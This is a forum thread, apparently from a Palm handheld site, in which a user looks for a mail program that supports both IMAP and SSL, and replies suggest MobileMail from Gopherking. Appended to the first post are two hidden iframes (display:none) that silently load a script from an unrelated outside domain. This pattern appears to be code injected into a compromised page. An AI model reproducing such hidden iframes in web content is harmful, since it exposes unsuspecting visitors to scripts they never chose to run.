+ Reply to Thread

SSL IMAP email and News using my I300?

Alright... I've read everywhere on the web that what I'm trying to do is not really possible (or cheap enough) to do... Thought I'd throw this one out there...

I connect to an IMAP mail server for my school.. I also use their newsgroups frequently as part of my class... They both require SSL authentication.. While I have no problem getting this to work through Outlook Express- how do I get this working using a Palm Mail Program.

Eudora supports SSL, but not IMAP.

Multimail supports IMAP, but not SSL.

Any suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

ok.. ill throw this out there....

have you looked at mobilemail? point your browser to www.gopherking.com and take a spin around the site. it should do what your loking for. they have a free trial but its 20 bucks/year to sign up. i use it.

I tried Gopherking...

Maybe I was missing something, but although it supports IMAP, I don't think it lets me specify an outgoing mail server.. For my account the incoming and outgoing servers are different. Not only that, but I don't think it supports SSL..

Please correct me if I'm wrong, I didn't have any manuals on it- i just "played with it" for an hour...

Thanks for the idea though

Will

Administrator

Arrow

well i know it uses encryption as i see the "key" logo on the pqa on the phone, however i have not played much with it other than accessing my msn mail.. you could email the developer bob ( i think thats his name) and ask him your question directly... if you do that , id be interested in knowing what the answer was.. he will answer the email..